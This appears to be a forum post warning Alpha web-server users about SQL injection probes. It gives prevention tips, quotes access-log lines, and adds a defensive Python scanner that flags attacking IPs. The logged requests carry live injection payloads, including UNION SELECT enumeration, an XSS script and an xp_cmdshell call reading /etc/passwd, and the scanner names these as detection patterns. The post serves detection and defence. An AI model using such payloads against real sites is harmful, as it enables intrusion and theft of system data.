Just a notice that I have had several SQL Injection attacks on the iadn.com website in the last week, all from several Netherlands IP addresses. It has nothing to do with the site being Alpha. But you should review your logs occasionally and have a means to block by IP address (You can use the one built into the Alpha web server, but it is better to use a 3rd party tool because although Alpha's block prevents access, each hit still takes up web server resources, and because you have to stop-start the Alpha server for the block to take effect).
Here is a summary of 'how to prevent' SQL injection attacks from the website: https://www.codeproject.com/Articles...on-How-to-Prev
- Encrypt sensitive data.
- Access the database using an account with the least privileges necessary.
- Install the database using an account with the least privileges necessary.
- Ensure that data is valid.
- Do a code review to check for the possibility of second-order attacks.
- Use parameterised queries.
- Use stored procedures.
- Re-validate data in stored procedures.
- Ensure that error messages give nothing away about the internal architecture of the application or the database.
Here is an example of how injection looks in the Alpha web server access log:
185.92.73.107 - - [05/Nov/2017:14:19:53 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d&qtsT%3D3276%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 200 60385
185.92.73.107 - - [05/Nov/2017:14:19:58 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d HTTP/1.1" 200 59573
185.92.73.107 - - [05/Nov/2017:14:20:02 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%27%2C%22..%2C%29%2C.%28 HTTP/1.1" 200 59655
185.92.73.107 - - [05/Nov/2017:14:20:05 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%27lnVaEb%3C%27%22%3EUCFjBq HTTP/1.1" 200 59665
185.92.73.107 - - [05/Nov/2017:14:20:16 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%29%20AND%206423%3D3998%20AND%20%286707%3D6707 HTTP/1.1" 200 59725
185.92.73.107 - - [05/Nov/2017:14:20:22 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%29%20AND%201860%3D1860%20AND%20%281962%3D1962 HTTP/1.1" 200 59725
185.92.73.107 - - [05/Nov/2017:14:20:26 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%29%20AND%204046%3D3998%20AND%20%289833%3D9833 HTTP/1.1" 200 59725
185.92.73.107 - - [05/Nov/2017:14:20:30 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%20AND%203636%3D8661 HTTP/1.1" 200 59641
185.92.73.107 - - [05/Nov/2017:14:20:35 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%20AND%201860%3D1860 HTTP/1.1" 200 59641
185.92.73.107 - - [05/Nov/2017:14:20:38 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%20AND%206370%3D5443 HTTP/1.1" 200 59641
185.92.73.107 - - [05/Nov/2017:14:20:42 -0600] "GET /events.a5w?A5WSessionId=f7587af9da034468b1e4202d16e9ad4d%27%29%20AND%203672%3D8377%20AND%20%28%27GUvw%27%3D%27GUvw HTTP/1.1" 200 59765
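A defender-side log check, added here as an example and not code from the original post or from Alpha Software: it parses access-log lines in the format shown above, percent-decodes the query string, flags the probe patterns visible in the excerpt (numeric tautologies, UNION SELECT, information_schema enumeration, xp_cmdshell, quote/paren fuzzing), and counts flagged requests per client IP so the noisy ones can be fed to a firewall block list instead of the Alpha server's own block. The sample lines, IPs and session id are constructed, not the ones from the post.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Common-log-format line: client IP, ident, user, [timestamp], "request", status, bytes.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')

# Signatures matched against the percent-decoded query string; each corresponds to
# a probe style seen in the log excerpt above.
SIGNATURES = {
    "tautology": re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I),
    "union_select": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "schema_enum": re.compile(r"information_schema", re.I),
    "cmd_exec": re.compile(r"xp_cmdshell", re.I),
    "quote_fuzz": re.compile(r"['\"]\)?\s*(AND|OR)\b", re.I),
}

def decode_query(request_target):
    """Percent-decode only the query string of a request target (path?query)."""
    _, _, query = request_target.partition("?")
    return unquote_plus(query)

def classify(line):
    """Return (client_ip, [matched signature names]) or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _ts, _method, target, _status, _size = m.groups()
    decoded = decode_query(target)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    return ip, hits

def suspicious_ips(lines, threshold=3):
    """Count flagged requests per client IP; return those at or above threshold."""
    per_ip = Counter()
    for line in lines:
        result = classify(line)
        if result and result[1]:
            per_ip[result[0]] += 1
    return {ip: n for ip, n in per_ip.items() if n >= threshold}

# Constructed sample lines modelled on the excerpt (documentation IPs, fake session id).
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Nov/2017:14:19:58 -0600] "GET /events.a5w?A5WSessionId=abc123 HTTP/1.1" 200 59573',
    '203.0.113.5 - - [05/Nov/2017:14:20:01 -0600] "GET /events.a5w?A5WSessionId=abc123&q%3D1%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2Ctable_name%20FROM%20information_schema.tables HTTP/1.1" 200 60385',
    '203.0.113.5 - - [05/Nov/2017:14:20:16 -0600] "GET /events.a5w?A5WSessionId=abc123%29%20AND%206423%3D3998%20AND%20%286707%3D6707 HTTP/1.1" 200 59725',
    '203.0.113.5 - - [05/Nov/2017:14:20:35 -0600] "GET /events.a5w?A5WSessionId=abc123%20AND%201860%3D1860 HTTP/1.1" 200 59641',
    '203.0.113.5 - - [05/Nov/2017:14:20:42 -0600] "GET /events.a5w?A5WSessionId=abc123%27%29%20AND%203672%3D8377%20AND%20%28%27GUvw%27%3D%27GUvw HTTP/1.1" 200 59765',
    '198.51.100.9 - - [05/Nov/2017:15:01:02 -0600] "GET /index.a5w HTTP/1.1" 200 1200',
]
```

Running `suspicious_ips(SAMPLE_LOG)` over the constructed lines reports only 203.0.113.5 (four flagged requests); the benign first request and the other client are not counted.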